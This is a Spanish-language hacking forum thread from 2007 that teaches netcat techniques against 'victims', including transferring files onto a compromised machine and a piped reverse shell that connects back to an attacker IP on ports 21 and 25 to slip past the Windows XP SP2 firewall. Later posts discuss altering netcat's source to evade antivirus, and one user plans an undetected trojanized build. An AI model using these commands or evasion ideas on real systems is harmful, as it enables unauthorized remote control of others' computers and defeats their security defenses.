Jugando con netcat

Iniciado por WHK, 25 Marzo 2007, 03:17 AM

0 Miembros y 3 Visitantes están viendo este tema.

octalh

#40
Bueno aqui esta mi aportacion XD  ;D

JUGANDO CON NETCAT
V

NETCAT PARA TRANSFERENCIA DE ARCHIVOS
no tendran que usar FTP ni TFTP una ves teniendo NC  en la victima


Lo primero sera prepararnos como servidor [ atacante ] para que el cliente [ victima ] posteriormente conecte a nosotros y descarge el file

sintaxis

nc -l -p PUERTO < FILE



Ahora desde la shell de la victima conectaremos a nosotros y recibiremos el file

sintaxis:

nc IP PUERTO > FILE



Ahora esperaremos un momento [ parecera que se colgo la shell ] pero no XD ... para comprobar que ya se descargo realizamos un dir en el servidor destino



como pueden ver el tamaño es de 700.416 bytes por lo tanto el archivo a sido descargado con exito

ahora solo queda precionar CTRL+C en la shell del cliente para detener el comando

bueno eso es todo salu2 y suerte

bytes..

ne0x

En vez de

nc -l -p PUERTO < FILE


tambien podemos usar un :


type archivo | nc IP PUERTO

si la vicitma tiene un puerto en escucha, o si en puerto en escucha es el nuestro:


type archivo | nc -L -p PUERTO


Prefiero usar el metodo de conectarte... usar puerto 21 que el firewall SP2 no cantara....

octalh

jaja nunca se me ocurrio hacerlo en modo pipeado

buen tip neox  ;D

ne0x

Gracias.

A esto le falta un " Jugando con el Netcat VI ", shell pipelada o volteada...

Voy a ponerme a hacerlo.

ne0x

#44
Jugando con Netcat VI


Shell volteada o pipelada:


Bien hasta ahora nosotros conocemos la tecnica de la shell directa e inversa, probemos la inversa, nos las ingeniamos para que la victima deje un puerto a la escucha...




Este comando camuflado con el metodo del iexplore tendria el mismo efecto, hace saltar el firewall de XP SP2 !!, y por lo tanto nosotros no nos podemos conectar a la victima...



EL firewall de XP SP2 detecta que actua como un servidor y lo bloquea!!

Asi, que que podemos hacer ??, pues una shell pipelada o volteada.

Esta técnica se basa en que la mayoria de los firewall aceptan la entrada de datos por el puerto 21 y la salida de estos por el puerto 25, de esta manera podemos burlar al firewall sin matarlo ni agregar el Netcat a la lista de excepciones.

El atacante deberá ejecutar los comandos:


nc –vv –L –p 21
  --> La ventana por la que dará las ordenes
nc –vv –L –p 25 --> La ventana por la cual verá el resultado de las mismas.




Y la víctima debe ejecutar:

nc –d <IP_ATACANTE> 80 | cmd.exe | nc –d <IP_ATACANTE> 25




Explicacion:

Usamos " pipes ", esto es basicamente un metodo para transmitir datos entre programas, nos conectamos al puerto 21 del atacante, todo lo que recibamos por ese puerto será redirigido a cmd.exe usando " | ", el resultado que dé cmd.exe será a la vez redirigido a la conexion que tenemos con el puerto 25 de la victima.

Por ese motivo las ordenes o comandos debemos escribirlos en la ventana en la que escuchemos el puerto 21 y recibiremos el resultado en el puerto 25.

Por que usamos el puerto 21 (FTP) ?

Pues por que el firewall de XP SP2 admite por defecto la entrada de datos por dicho puertos, como tambien la admite por el puerto 80, etc...

Por que usamos el puerto 25 (SMTP) ?

Pues basicamente lo mismo que lo anterior, pero en este caso lo permitido es la salida de datos.



Entonces en la nos saldra esto:





En la ventana donde escuchamos el puerto 21 escribiremos los comandos y en la que usamos el puerto 25 veremos el resultado...

Y todo esto sin que el firewall no diga ni pio!!, la unica forma de que nos funcione un Netcatt troyanizado usando unicamente el Netcat para esquivar el firewall...


Novlucker

Este post esta quedando realmente muy completo... pero de cualquier manera hay que ver que varios de los metodos que se usan aqui estan en el paper de zhyzura

:-X
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

ne0x

#46
Sobretodo el de shell pipelada o volteada, lo que pasa es que yo veia necesario explicarlo, es el unico metodo de saltarse el firewall unicamente usando el Netcat...

Ya estan puestas las fotos de Jugando con netcat VI

WHK

#47
jajajajaja muy bueno grax por el aporte XD

NewLog

Yo tengo una duda.

El código de nc es abierto verdad? En el caso de que lo fuera... No habría modo alguno de que añadiendo código el antivirus no lo detectara?

Quizá es muy avanzado para este hilo pero siempre me lo he preguntado... y con una respuesta de que es posible (sin cambiar todo el nc) me basta!

Gracias!

WHK

Si se puede, trataré de aprender mas sobre el metodo RIT para poder darles un netcat que no sea detectado, pero porfavor si llego a hacerlo traten de no ponerlo en ninguna pagina web para que no lo buelvan a detectar, si alguien lo hace rimero vienvenido sea porque creo que me voy a demorar mucho en hacerlo  :-\